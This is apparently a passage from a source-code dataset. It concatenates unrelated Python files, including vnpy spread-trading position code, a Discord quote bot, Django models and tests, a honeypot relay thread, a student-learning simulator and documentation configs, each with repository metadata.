for leg in self.allLegs:
if leg.multiplier >= 0:
legSymbol = '+%s*%s' %(leg.multiplier, leg.vtSymbol)
else:
legSymbol = '%s*%s' %(leg.multiplier, leg.vtSymbol)
legSymbolList.append(legSymbol)
self.symbol = ''.join(legSymbolList)
#----------------------------------------------------------------------
def calculatePrice(self):
"""计算价格"""
# 清空价格和委托量数据
self.bidPrice = EMPTY_FLOAT
self.askPrice = EMPTY_FLOAT
self.askVolume = EMPTY_INT
self.bidVolume = EMPTY_INT
# 遍历价差腿列表
for n, leg in enumerate(self.allLegs):
# 计算价格
if leg.multiplier > 0:
self.bidPrice += leg.bidPrice * leg.multiplier
self.askPrice += leg.askPrice * leg.multiplier
else:
self.bidPrice += leg.askPrice * leg.multiplier
self.askPrice += leg.bidPrice * leg.multiplier
# 计算报单量:floor向下取整
if leg.ratio > 0:
legAdjustedBidVolume = floor(leg.bidVolume / leg.ratio)
legAdjustedAskVolume = floor(leg.askVolume / leg.ratio)
else:
legAdjustedBidVolume = floor(leg.askVolume / abs(leg.ratio))
legAdjustedAskVolume = floor(leg.bidVolume / abs(leg.ratio))
if n == 0:
self.bidVolume = legAdjustedBidVolume # 对于第一条腿,直接初始化
self.askVolume = legAdjustedAskVolume
else:
self.bidVolume = min(self.bidVolume, legAdjustedBidVolume) # 对于后续的腿,价差可交易报单量取较小值
self.askVolume = min(self.askVolume, legAdjustedAskVolume)
# 更新时间
self.time = datetime.now().strftime('%H:%M:%S.%f')[:-3]
#----------------------------------------------------------------------
def calculatePos(self):
"""计算持仓"""
# 清空持仓数据
self.longPos = EMPTY_INT
self.shortPos = EMPTY_INT
self.netPos = EMPTY_INT
self.actlegLongPos = EMPTY_INT
self.actlegLongValue = EMPTY_FLOAT
self.actlegShortPos = EMPTY_INT
self.actlegShortValue = EMPTY_FLOAT
self.passlegLongPos = EMPTY_INT
self.passlegLongValue = EMPTY_FLOAT
self.passlegShortgPos = EMPTY_INT
self.passlegShortValue = EMPTY_FLOAT
self.profitloss = EMPTY_FLOAT
# 遍历价差腿列表
for n, leg in enumerate(self.allLegs):
if leg.ratio > 0:
legAdjustedLongPos = floor(leg.longPos / leg.ratio)
legAdjustedShortPos = floor(leg.shortPos / leg.ratio)
else:
legAdjustedLongPos = floor(leg.shortPos / abs(leg.ratio))
legAdjustedShortPos = floor(leg.longPos / abs(leg.ratio))
if n == 0:
self.longPos = legAdjustedLongPos
self.shortPos = legAdjustedShortPos
else:
self.longPos = min(self.longPos, legAdjustedLongPos)
self.shortPos = min(self.shortPos, legAdjustedShortPos)
#计算浮动盈亏
sql = ' SELECT LONG_POSITION, LONG_POSITION*LONG_OPEN_AVG_PRICE,SHORT_POSITION,SHORT_POSITION*SHORT_OPEN_AVG_PRICE' \
' from defer_real_hold where SYMBOL = \'%s\' and STRATAGE = \'%s\' ' % (leg.vtSymbol, self.name)
#retPos = vnpy.DAO.getDataBySQL('vnpy', sql)
print (u'leginfo:vtSymbol=%s,name=%s' % (leg.vtSymbol, self.name))
retPos = vnpy.DAO.getDataBySQL('vnpy', sql)
# 根据以上条件查询出的默认持仓只有一条记录,目前被动腿也只有一条leg
print retPos
print leg
print self.activeLeg,self.passiveLegs
if leg == self.activeLeg:
print (u'leginfo:self.askPrice=%s' % (str(self.askPrice)))
self.actlegLongPos = retPos.icol(0).get_values()
self.actlegLongValue = retPos.icol(1).get_values()
self.actlegShortPos = retPos.icol(2).get_values()
self.actlegShortValue = retPos.icol(3).get_values()
print self.actlegLongPos,self.actlegLongValue,self.actlegShortPos,self.actlegShortValue
#被动腿有可能有多条腿
elif leg in self.passiveLegs:
self.passlegLongPos += retPos.icol(0).get_values()
self.passlegLongValue += retPos.icol(1).get_values()
self.passlegShortgPos += retPos.icol(2).get_values()
self.passlegShortValue += retPos.icol(3).get_values()
else:
pass
#浮动盈亏=主动腿盈亏+被动腿盈亏
self.profitloss = (self.actlegLongValue - self.actlegLongPos * leg.askPrice ) + (self.passlegShortValue - self.passlegShortgPos * leg.bidPrice) \
+ (self.actlegShortValue - self.actlegShortPos * leg.bidPrice) + ( self.passlegLongValue - self.passlegLongPos * leg.askPrice)
#self.profitloss = self.actlegLongPos*self.askPrice + self.actlegShortPos*self.bidPrice
print (u'leginfo:self.actleg=%s,self.actlegPos=%s,self.profitloss=%s' % (str(self.actlegLongPos), str(self.actlegLongValue),str(self.profitloss)))
# 计算净仓位
self.longPos = int(self.longPos)
self.shortPos = int(self.shortPos)
self.netPos = self.longPos - self.shortPos
#wzhua 20170917 新增计算浮动盈亏
self.actlegLongPos = int(self.actlegLongPos)
self.actlegLongValue = float(self.actlegLongValue)
self.actlegShortPos = int(self.actlegShortPos)
self.actlegShortValue = float(self.actlegShortValue)
self.passlegLongPos = int(self.passlegLongPos)
self.passlegLongValue = float(self.passlegLongValue)
self.passlegShortgPos = int(self.passlegShortgPos)
self.passlegShortValue = float(self.passlegShortValue)
self.profitloss = float(self.profitloss)
#----------------------------------------------------------------------
def addActiveLeg(self, leg):
"""添加主动腿"""
self.activeLeg = leg
#----------------------------------------------------------------------
def addPassiveLeg(self, leg):
"""添加被动腿"""
self.passiveLegs.append(leg)
| 37.270588 | 158 | 0.551557 |
abfd898f1fd7a927dd38c972caa71877640b65cc | 2,728 | py | Python | quotatron.py | ItsPonks/DiscordBots | 062c4e6b33835fc3cde391011125d4cfd7ae1c6a | [
"MIT"
] | null | null | null | quotatron.py | ItsPonks/DiscordBots | 062c4e6b33835fc3cde391011125d4cfd7ae1c6a | [
"MIT"
] | null | null | null | quotatron.py | ItsPonks/DiscordBots | 062c4e6b33835fc3cde391011125d4cfd7ae1c6a | [
"MIT"
] | null | null | null | from app import SlashBot
from async_timeout import timeout
from asyncio import TimeoutError
from datetime import datetime, timedelta, timezone
from hikari import ButtonStyle, CacheSettings, Member, UNDEFINED
from random import choice, sample, uniform
bot = SlashBot(cache_settings=CacheSettings(max_messages=10000))
async def find(context, success, failure, *members):
channel = context.get_channel()
guild = context.get_guild()
link = None
a = datetime.now(timezone.utc)
try:
async with timeout(900) as to:
content = ''
messages = set()
for i, member in enumerate(members):
predicates = [lambda m: m.content and not (m.mentions.everyone or m.mentions.role_ids or m.mentions.users) and m.content not in messages and '://' not in m.content]
attrs = dict(attachments=[], embeds=[], stickers=[])
if member:
b = max(channel.created_at, member.joined_at)
attrs['author'] = member.user
else:
b = channel.created_at
predicates.append(lambda m: not m.author.is_bot and m.author.discriminator != '0000')
until = timedelta(seconds=(to.deadline - to._loop.time()) / (len(members) - i)) + datetime.now()
while datetime.now() < until:
if history := await channel.fetch_history(around=uniform(a, b)).limit(101).filter(*predicates, **attrs):
m = choice(history)
link = m.make_link(guild)
messages.add(m)
content += success.format(username=m.author.username, content=m.content.replace('\n', ' \\ '), date=m.timestamp.date())
break
if len(content) <= 2000:
return content or failure, link
except TimeoutError:
return 'All attempts at finding quotes exceeded the maximum length.', None
@bot.slash('Randomly quotes members in this channel.')
async def convo(context, *members: ('Quote whom?', Member), count: ('How many?', int) = 5):
content, _ = await find(context, '{username}: {content}\n', 'No messages found.', *sample(members, len(members)) or [None] * min(count, 100))
await context.respond(content)
@bot.slash('Randomly quotes a member in this channel.')
async def quote(context, member: ('Quote whom?', Member) = None):
content, link = await find(context, '"{content}" -{username}, {date}', 'No message found.', member)
await context.respond(content, component=bot.button('Original', ButtonStyle.LINK, link) if link else UNDEFINED)
bot.run()
| 50.518519 | 181 | 0.606305 |
abfe2c1cf99654791bb342078effa2478f34e393 | 310 | py | Python | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py | nathfroech/cookiecutter-django | 9568671807c24655d0c51ecef91d22fe8b550d3f | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py | nathfroech/cookiecutter-django | 9568671807c24655d0c51ecef91d22fe8b550d3f | [
"BSD-3-Clause"
] | null | null | null | {{cookiecutter.project_slug}}/{{cookiecutter.project_slug}}/users/tests/test_models.py | nathfroech/cookiecutter-django | 9568671807c24655d0c51ecef91d22fe8b550d3f | [
"BSD-3-Clause"
] | null | null | null | import pytest
from hamcrest import assert_that, equal_to, is_
from django.conf import settings
@pytest.mark.django_db
def test_user_get_absolute_url(user: settings.AUTH_USER_MODEL):
expected_url = '/users/{0}/'.format(user.username)
assert_that(user.get_absolute_url(), is_(equal_to(expected_url)))
| 28.181818 | 69 | 0.790323 |
abfe5cbf9100c74ccd8fce63d1076b3d06dffdca | 93 | py | Python | protocols/apps.py | OhEvolve/LabBio | 4495f70ea544e0c7208d51abcb1469adcb84fc1b | [
"MIT"
] | null | null | null | protocols/apps.py | OhEvolve/LabBio | 4495f70ea544e0c7208d51abcb1469adcb84fc1b | [
"MIT"
] | null | null | null | protocols/apps.py | OhEvolve/LabBio | 4495f70ea544e0c7208d51abcb1469adcb84fc1b | [
"MIT"
] | null | null | null | from django.apps import AppConfig
class ProtocolsConfig(AppConfig):
name = 'protocols'
| 15.5 | 33 | 0.763441 |
abff8a668f2d6433edc42fc8d0de063e6d1e1a69 | 2,745 | py | Python | hpotter/src/one_way_thread.py | LarsenClose/dr.hpotter | ef6199ab563a92f3e4916277dbde9217126f36a9 | [
"MIT"
] | 1 | 2021-08-15T09:24:20.000Z | 2021-08-15T09:24:20.000Z | hpotter/src/one_way_thread.py | LarsenClose/dr.hpotter | ef6199ab563a92f3e4916277dbde9217126f36a9 | [
"MIT"
] | 18 | 2021-02-01T21:58:20.000Z | 2021-05-24T17:10:25.000Z | hpotter/src/one_way_thread.py | LarsenClose/dr.hpotter | ef6199ab563a92f3e4916277dbde9217126f36a9 | [
"MIT"
] | 1 | 2021-06-19T12:49:54.000Z | 2021-06-19T12:49:54.000Z | ''' Threads that go to/from containers, limit data and lines, and insert
data into the Data table. '''
import threading
from src import tables
from src.logger import logger
from src.lazy_init import lazy_init
class OneWayThread(threading.Thread):
''' One thread to/from container. '''
# pylint: disable=E1101, W0613
@lazy_init
def __init__(self, source, dest, connection, container, direction, database):
super().__init__()
self.length = self.container.get(self.direction + '_length', 4096)
self.commands = self.container.get(self.direction + '_commands', 10)
self.delimiters = self.container.get(self.direction + '_delimiters', ['\n', '\r'])
self.shutdown_requested = False
def _read(self):
logger.debug('%s reading from: %s', self.direction, str(self.source))
data = self.source.recv(4096)
logger.debug('%s read: %s', self.direction, str(data))
return data
def _write(self, data):
logger.debug('%s sending to: %s', self.direction, str(self.dest))
self.dest.sendall(data)
logger.debug('%s sent: %s', self.direction, str(data))
def _too_many_commands(self, data):
if self.commands > 0:
sdata = str(data)
count = 0
for delimiter in self.delimiters:
count = max(count, sdata.count(delimiter))
if count >= self.commands:
logger.info('Commands exceeded, stopping')
return True
return False
def run(self):
total = b''
while True:
try:
data = self._read()
if not data or data == b'':
break
self._write(data)
except Exception as exception:
logger.debug('%s %s', self.direction, str(exception))
break
total += data
if self.shutdown_requested:
break
if self.length > 0 and len(total) >= self.length:
logger.debug('Length exceeded')
break
if self._too_many_commands(data):
break
logger.debug(self.length)
logger.debug(len(total))
logger.debug(self.direction)
save = self.direction + '_save'
if (save in self.container and self.container[save]) and (self.length > 0 and len(total) > 0):
self.database.write(tables.Data(direction=self.direction,
data=str(total), connection=self.connection))
self.source.close()
self.dest.close()
def shutdown(self):
''' Called from external source when HPotter shutting down. '''
self.shutdown_requested = True
| 33.072289 | 102 | 0.579964 |
abffd96161e8443437fe3910d4ce59e8abc42d99 | 731 | py | Python | tests/_test_version_greater.py | jonyboi396825/COM-Server | e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905 | [
"MIT"
] | 4 | 2021-11-09T04:11:51.000Z | 2022-01-30T01:03:16.000Z | tests/_test_version_greater.py | jonyboi396825/COM-Server | e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905 | [
"MIT"
] | 55 | 2021-11-15T16:36:25.000Z | 2022-03-10T04:48:08.000Z | tests/_test_version_greater.py | jonyboi396825/COM-Server | e4e8a1a5e9f86c1036ebb7ac3d39c20b63e7e905 | [
"MIT"
] | 1 | 2021-11-12T02:14:07.000Z | 2021-11-12T02:14:07.000Z | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Version testing
Don't want to run when running `pytest`, only run when something
is pushed to develop branch or PR to master.
"""
import configparser
import requests
from com_server import __version__
from passive.cmp_version import Version
def test_version_greater() -> None:
"""Tests if current version is greater than version on master branch on github"""
req = requests.get(
"https://raw.githubusercontent.com/jonyboi396825/COM-Server/master/setup.cfg"
)
cfg = configparser.ConfigParser()
cfg.read_string(req.text)
master_vers = Version(cfg["metadata"]["version"])
cur_vers = Version(__version__)
assert cur_vers > master_vers
| 23.580645 | 85 | 0.719562 |
2800fe4ff8f5543c36554bc37b647db2a125d9ae | 390 | py | Python | mp/visualize/models.py | Ecotrust/PEW-EFH | 83e404fe90e957891ab2dfaad327e52346cea748 | [
"Apache-2.0"
] | 1 | 2017-09-06T14:05:48.000Z | 2017-09-06T14:05:48.000Z | mp/visualize/models.py | Ecotrust/PEW-EFH | 83e404fe90e957891ab2dfaad327e52346cea748 | [
"Apache-2.0"
] | 126 | 2015-01-05T19:47:52.000Z | 2021-09-07T23:44:29.000Z | mp/visualize/models.py | Ecotrust/COMPASS | 42ee113e4d66767300cfab0d6ce1f35847f447ed | [
"Apache-2.0"
] | null | null | null | from django.db import models
from django.conf import settings
from django.contrib.gis.db import models
from madrona.features import register
from madrona.features.models import Feature
@register
class Bookmark(Feature):
url_hash = models.CharField(max_length=2050)
class Options:
verbose_name = 'Marine Planner Bookmark'
form = 'visualize.forms.BookmarkForm' | 27.857143 | 49 | 0.761538 |
2804d5dc2b4f1fcfefbc0acd3532b59ffc96d9f6 | 1,827 | py | Python | util/levels.py | Xetera/IreneBot | e768bb3a0d2517ecb00d50da89d66ac0dd1498d0 | [
"MIT"
] | 1 | 2021-10-02T16:05:11.000Z | 2021-10-02T16:05:11.000Z | util/levels.py | Xetera/IreneBot | e768bb3a0d2517ecb00d50da89d66ac0dd1498d0 | [
"MIT"
] | null | null | null | util/levels.py | Xetera/IreneBot | e768bb3a0d2517ecb00d50da89d66ac0dd1498d0 | [
"MIT"
] | null | null | null | from Utility import resources as ex
# noinspection PyPep8
class Levels:
@staticmethod
async def get_level(user_id, command):
"""Get the level of a command (rob/beg/daily)."""
count = ex.first_result(
await ex.conn.fetchrow(f"SELECT COUNT(*) FROM currency.Levels WHERE UserID = $1 AND {command} > $2",
user_id, 1))
if not count:
level = 1
else:
level = ex.first_result(
await ex.conn.fetchrow(f"SELECT {command} FROM currency.Levels WHERE UserID = $1", user_id))
return int(level)
@staticmethod
async def set_level(user_id, level, command):
"""Set the level of a user for a specific command."""
async def update_level():
"""Updates a user's level."""
await ex.conn.execute(f"UPDATE currency.Levels SET {command} = $1 WHERE UserID = $2", level, user_id)
count = ex.first_result(await ex.conn.fetchrow(f"SELECT COUNT(*) FROM currency.Levels WHERE UserID = $1", user_id))
if not count:
await ex.conn.execute("INSERT INTO currency.Levels VALUES($1, NULL, NULL, NULL, NULL, 1)", user_id)
await update_level()
else:
await update_level()
@staticmethod
async def get_xp(level, command):
"""Returns money/experience needed for a certain level."""
if command == "profile":
return 250 * level
return int((2 * 350) * (2 ** (level - 2))) # 350 is base value (level 1)
@staticmethod
async def get_rob_percentage(level):
"""Get the percentage of being able to rob. (Every 1 is 5%)"""
chance = int(6 + (level // 10)) # first 10 levels is 6 for 30% chance
if chance > 16:
chance = 16
return chance
| 38.87234 | 123 | 0.586207 |
2806153fe5679750056acfcdb852bf9fdff951e3 | 374 | py | Python | src/python_pachyderm/experimental/mixin/__init__.py | sjezewski/pypachy | 4bc022d0c73140475f9bd0acd5c0e7204609de26 | [
"Apache-2.0"
] | 2 | 2017-02-01T14:22:34.000Z | 2017-02-01T19:58:54.000Z | src/python_pachyderm/experimental/mixin/__init__.py | sjezewski/pypachy | 4bc022d0c73140475f9bd0acd5c0e7204609de26 | [
"Apache-2.0"
] | 3 | 2018-02-13T20:40:59.000Z | 2018-02-13T22:23:41.000Z | src/python_pachyderm/experimental/mixin/__init__.py | sjezewski/pypachy | 4bc022d0c73140475f9bd0acd5c0e7204609de26 | [
"Apache-2.0"
] | null | null | null | """
Exposes an experimental mixin for each pachyderm service. These mixins should
not be used directly; instead, you should use
``python_pachyderm.experimental.Client()``. The mixins exist exclusively in
order to provide better code organization, because we have several mixins,
rather than one giant
:class:`Client <python_pachyderm.experimental.client.Client>` class.
"""
| 41.555556 | 77 | 0.799465 |
f9eaf3d0c02077230ba993a6dcd5aeadb2b3f5df | 1,533 | py | Python | Hydraslayer/Utility.py | Jorisvansteenbrugge/GapFiller | ff879935765ed47eafcc0f38e47042694657d961 | [
"MIT"
] | null | null | null | Hydraslayer/Utility.py | Jorisvansteenbrugge/GapFiller | ff879935765ed47eafcc0f38e47042694657d961 | [
"MIT"
] | null | null | null | Hydraslayer/Utility.py | Jorisvansteenbrugge/GapFiller | ff879935765ed47eafcc0f38e47042694657d961 | [
"MIT"
] | null | null | null | import logging
logger = logging.getLogger("Hydraslayer")
def get_consensusbase(bases, mincov=3):
"""
:param mincov:
:type bases: list
"""
bases = "".join(bases)
a = bases.count('A')
t = bases.count('T')
c = bases.count('C')
g = bases.count('G')
n = bases.count("N") + bases.count('-')
counts = [(a, 'A'), (t, 'T'), (c, 'C'), (g, 'G')]
s_dic = sorted(counts, key=lambda x: x[0], reverse=True)
max = s_dic[0]
if max[0] < mincov:
return "N"
else:
return max[1]
def get_gap_pos_alignment(record):
sequence = str(record.seq)
N_pos = [x for x, nuc in enumerate(sequence) if nuc == "N"]
return N_pos
def extract_positions(seq, positions):
return "".join([seq[idx] for idx in positions])
def pretty_print_alignment(fasta_sequences):
alignment_len = len(fasta_sequences[0])
for x in range(alignment_len):
row = []
for alignment in fasta_sequences:
row.append(alignment[x])
print(" ".join(row))
def get_consensus(fasta_seqs, mincov):
"""Get the per-position consensus sequence, excluding gaps.
All read sequences (not the assembly sequence) are merged into a consensus sequence.
"""
consensus = []
alignment_len = len(fasta_seqs[0])
for x in range(alignment_len):
bases = [fasta[x] for fasta in fasta_seqs]
consensus.append(get_consensusbase(bases, mincov))
# logger.debug(f'Consensus {"".join(consensus)}')
return "".join(consensus)
| 23.227273 | 92 | 0.613177 |
f9eb5ae0a2f921af7f1e7867be9f3e3a70e3a5d2 | 5,094 | py | Python | src/student/student_model.py | YoshikiKubotani/RLTutor | 17d7cd274d0ea5ef69a4590b01ab905a4ed58463 | [
"MIT"
] | 3 | 2021-08-10T09:57:42.000Z | 2022-03-10T12:52:56.000Z | src/student/student_model.py | YoshikiKubotani/rltutor | 17d7cd274d0ea5ef69a4590b01ab905a4ed58463 | [
"MIT"
] | 1 | 2021-04-17T03:35:33.000Z | 2021-04-23T15:58:02.000Z | src/student/student_model.py | YoshikiKubotani/rltutor | 17d7cd274d0ea5ef69a4590b01ab905a4ed58463 | [
"MIT"
] | null | null | null | import copy
import numpy as np
from collections import defaultdict
import utils
class DAS3HStudent:
def __init__(self, time_weight, n_items, n_skills, seed):
np.random.seed(seed)
self.alpha = np.random.normal(loc=-1.5, scale=0.3, size=1)
self.delta = np.random.normal(loc=-1.0, scale=0.5, size=n_items)
self.beta = np.random.normal(loc=-1.0, scale=0.5, size=n_skills)
self.time_weight = time_weight
self.weight = np.hstack((self.delta, self.beta, self.time_weight))
self.h = 0.3
self.d = 0.8
def predict_proba(self, input_sparse_vec, lag):
for_sigmoid = self.alpha + np.dot(self.weight, input_sparse_vec)
ret = 1 / (1 + np.exp(-for_sigmoid)[0])
ret = (1 - ret) * (1 + self.h * lag) ** (-self.d) + ret
return ret
class StudentModel(object):
def __init__(
self, n_items, n_skills, n_wins, seed, item_skill_mat, model
):
self.name = "DAS3H"
np.random.seed(seed)
self.n_items = n_items
self.n_skills = n_skills
self.n_wins = n_wins
self.predictor = model
self.item_skill_mat = item_skill_mat
self.n_item_feats = int(np.log(2 * self.n_items))
self.item_feats = np.random.normal(
np.zeros(2 * self.n_items * self.n_item_feats),
np.ones(2 * self.n_items * self.n_item_feats),
).reshape((2 * self.n_items, self.n_item_feats))
self.now = 0
self.last_time = defaultdict(lambda: -10)
self.curr_item = np.random.randint(self.n_items)
self.q = defaultdict(lambda: utils.OurQueue())
self.curr_outcome = 0
self.curr_delay = 0
self.skill_ids = None
def _make_input_vec(self, selected_item_id, now_q):
item_vec = np.zeros(self.n_items)
skill_vec = np.zeros(self.n_skills)
correct_vec = np.zeros(self.n_wins * self.n_skills)
attempt_vec = np.zeros(self.n_wins * self.n_skills)
item_vec[selected_item_id] = 1
index_of_selected_skills = np.argwhere(
self.item_skill_mat[selected_item_id] == 1
)
self.skill_ids = index_of_selected_skills.transpose()[0].tolist()
self.skill_ids = list(set(self.skill_ids))
skill_vec[self.skill_ids] = 1
for skill_id in self.skill_ids:
correct_vec[skill_id * self.n_wins : (skill_id + 1) * self.n_wins] = np.log(
1 + np.array(now_q[skill_id, "correct"].get_counters(self.now))
)
attempt_vec[skill_id * self.n_wins : (skill_id + 1) * self.n_wins] = np.log(
1 + np.array(now_q[skill_id].get_counters(self.now))
)
return_np_vec = np.hstack((item_vec, skill_vec, correct_vec, attempt_vec))
return return_np_vec
def _encode_delay(self):
v = np.zeros(2)
v[self.curr_outcome] = np.log(1 + self.curr_delay)
return v
def _encode_delay2(self):
v = np.zeros(2)
delay = self.curr_delay
if len(self.q.queue) != 0:
delay = self.now - self.q.queue[-1]
v[self.curr_outcome] = np.log(1 + delay)
return v
def _vectorized_obs(self):
encoded_item = self.item_feats[
self.n_items * self.curr_outcome + self.curr_item, :
]
return np.hstack(
(encoded_item, self._encode_delay(), np.array([self.curr_outcome]))
)
def step(self, action, now):
self.curr_item = action
self.curr_delay = now - self.now
self.now += self.curr_delay
input_vec = self._make_input_vec(self.curr_item, copy.deepcopy(self.q))
lag = self.now - self.last_time[self.curr_item]
recall_prob = self.predictor.predict_proba(input_vec, lag)
self.curr_outcome = 1 if np.random.random() < recall_prob else 0
self._update_model()
obs = self._vectorized_obs()
return self.curr_outcome, obs
def _update_model(self):
self.last_time[self.curr_item] = self.now
for skill_id in self.skill_ids:
_ = self.q[skill_id, "correct"].get_counters(self.now)
_ = self.q[skill_id].get_counters(self.now)
if self.curr_outcome == 1:
self.q[skill_id, "correct"].push(self.now)
self.q[skill_id].push(self.now)
def get_retention_rate(self):
retention_rate_list = []
curr_q = copy.deepcopy(self.q)
for item in range(self.n_items):
input_vec = self._make_input_vec(item, curr_q)
lag = self.now - self.last_time[item]
recall_prob = self.predictor.predict_proba(input_vec, lag)
retention_rate_list.append(recall_prob)
return retention_rate_list
def reset(self, seed):
np.random.seed(seed)
self.now = 0
self.last_time = defaultdict(lambda: -10)
self.curr_item = np.random.randint(self.n_items)
self.q = defaultdict(lambda: utils.OurQueue())
self.curr_outcome = 0
self.curr_delay = 0
self.skill_ids = None | 35.622378 | 88 | 0.611504 |
f9ee55d442bf6d3dde7fbd268f409bf967f59adc | 163 | py | Python | Dataset/Leetcode/train/125/374.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/125/374.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | Dataset/Leetcode/train/125/374.py | kkcookies99/UAST | fff81885aa07901786141a71e5600a08d7cb4868 | [
"MIT"
] | null | null | null | class Solution:
'''第九题'''
def XXX(self, s: str) -> bool:
s = ''.join([i.lower() for i in s if i.strip().isalnum()])
return s == s[::-1]
| 20.375 | 66 | 0.466258 |
f9eebbfc0db7d11ed30b9b7cf32f005e8751ccbd | 39 | py | Python | lang/Python/singly-linked-list-traversal-1.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | lang/Python/singly-linked-list-traversal-1.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | lang/Python/singly-linked-list-traversal-1.py | ethansaxenian/RosettaDecode | 8ea1a42a5f792280b50193ad47545d14ee371fb7 | [
"MIT"
] | null | null | null | for node in lst:
print(node.value)
| 13 | 21 | 0.666667 |
f9ef1102a1c613bcb45da31777d89452e59168b6 | 2,625 | py | Python | conversion_tools/misc_functions.py | xiaoping-yang/ms2pip_c | 061fcd8aa8c315b775ac64f5c1f7dfe0a09bdea9 | [
"Apache-2.0"
] | 14 | 2018-08-21T04:58:22.000Z | 2022-03-21T11:40:12.000Z | conversion_tools/misc_functions.py | xiaoping-yang/ms2pip_c | 061fcd8aa8c315b775ac64f5c1f7dfe0a09bdea9 | [
"Apache-2.0"
] | 69 | 2018-05-23T12:52:16.000Z | 2022-03-14T20:42:49.000Z | conversion_tools/misc_functions.py | xiaoping-yang/ms2pip_c | 061fcd8aa8c315b775ac64f5c1f7dfe0a09bdea9 | [
"Apache-2.0"
] | 10 | 2019-04-28T01:24:10.000Z | 2022-03-04T18:37:47.000Z | """
Miscellaneous functions regarding MS2PIP file conversions.
"""
import re
import pandas as pd
def add_fixed_mods(peprec, fixed_mods=None, n_term=None, c_term=None):
"""
Add 'fixed' modifications to all peptides in an MS2PIP PEPREC file.
Return list with MS2PIP modifications with fixed mods added.
Positional arguments:
peprec - MS2PIP PEPREC DataFrame
Keyword arguments:
fixed_mods - List of tuples. First tuple element is amino acid, second tuple
element is modification name. E.g. `[('K', 'TMT6plex')]`
n_term - Name of fixed N-terminal modification to add
c_term - Name of fixed C-terminal modification to add
"""
if not fixed_mods:
fixed_mods = []
result = []
for _, row in peprec.iterrows():
mods = row['modifications']
if mods == '-':
mods = []
else:
mods = mods.split('|')
current_mods = list(zip([int(i) for i in mods[::2]], mods[1::2]))
for aa, mod in fixed_mods:
current_mods.extend([(m.start()+1, mod) for m in re.finditer(aa, row['peptide'])])
if n_term and not 0 in [i for i, n in current_mods]:
current_mods.append((0, n_term))
if c_term and not -1 in [i for i, n in current_mods]:
current_mods.append((-1, c_term))
current_mods = sorted(current_mods, key=lambda x: x[0])
current_mods = '|'.join(['|'.join(m) for m in [(str(i), n) for i, n in current_mods]])
result.append(current_mods)
return result
def peprec_add_charges(peprec_filename, mgf_filename, overwrite=False):
"""
Get precursor charges from MGF file and add them to a PEPREC
"""
peprec = pd.read_csv(peprec_filename, sep=' ', index_col=None)
if not overwrite and 'charge' in peprec.columns:
print('Charges already in PEPREC')
return None
spec_count = 0
charges = {}
with open(mgf_filename, 'rt') as f:
for line in f:
if line.startswith('TITLE='):
title = line[6:].strip()
spec_count += 1
if line.startswith('CHARGE='):
charge = line[7:].strip()
charges[title] = charge
if not spec_count == len(charges):
print('Something went wrong')
return None
peprec['charge'] = peprec['spec_id'].map(charges)
new_peprec_filename = re.sub('\.peprec$|\.PEPREC$', '', peprec_filename) + '_withcharges.peprec'
peprec.to_csv(new_peprec_filename, sep=' ', index=False)
print('PEPREC with charges written to ' + new_peprec_filename)
return peprec | 30.882353 | 100 | 0.613333 |
f9f160c2036c4a9de666283011c042c949cb5728 | 2,518 | py | Python | docs/conf.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | 2 | 2020-08-26T11:24:43.000Z | 2021-07-28T09:46:40.000Z | docs/conf.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | 153 | 2020-08-26T10:45:35.000Z | 2021-12-10T17:33:16.000Z | docs/conf.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | null | null | null | # Configuration file for the Sphinx documentation builder.
#
# This file only contains a selection of the most common options. For a full
# list see the documentation:
# https://www.sphinx-doc.org/en/master/usage/configuration.html
# -- Path setup --------------------------------------------------------------
import os
import sys
import django
sys.path.insert(0, os.path.abspath("../src"))
import openpersonen # noqa isort:skip
from openpersonen.setup import setup_env # noqa isort:skip
setup_env()
django.setup()
# -- Project information -----------------------------------------------------
project = "Open Personen"
copyright = "2020, Maykin Media"
author = openpersonen.__author__
# The full version, including alpha/beta/rc tags
release = openpersonen.__version__
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.todo",
"sphinx_tabs.tabs",
"recommonmark",
# "sphinx_markdown_tables",
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = "en"
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ["_build", "Thumbs.db", ".DS_Store"]
source_suffix = [".rst", ".md"]
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_logo = "logo.png"
html_theme = "sphinx_rtd_theme"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
html_css_files = [
'theme_overrides.css', # override wide tables with word wrap
]
todo_include_todos = True
linkcheck_ignore = [
r"https?://.*\.gemeente.nl",
r"http://localhost:\d+/",
r"https://.*sentry.*",
]
| 29.97619 | 78 | 0.673153 |
f9f1a4c66877c2a359160ca92cd9a1a5bd503f2e | 1,547 | py | Python | tests/test_preprocessing.py | mitchelllisle/leonard | 09f2f72d1f103813233c19950189a502868ce60a | [
"MIT"
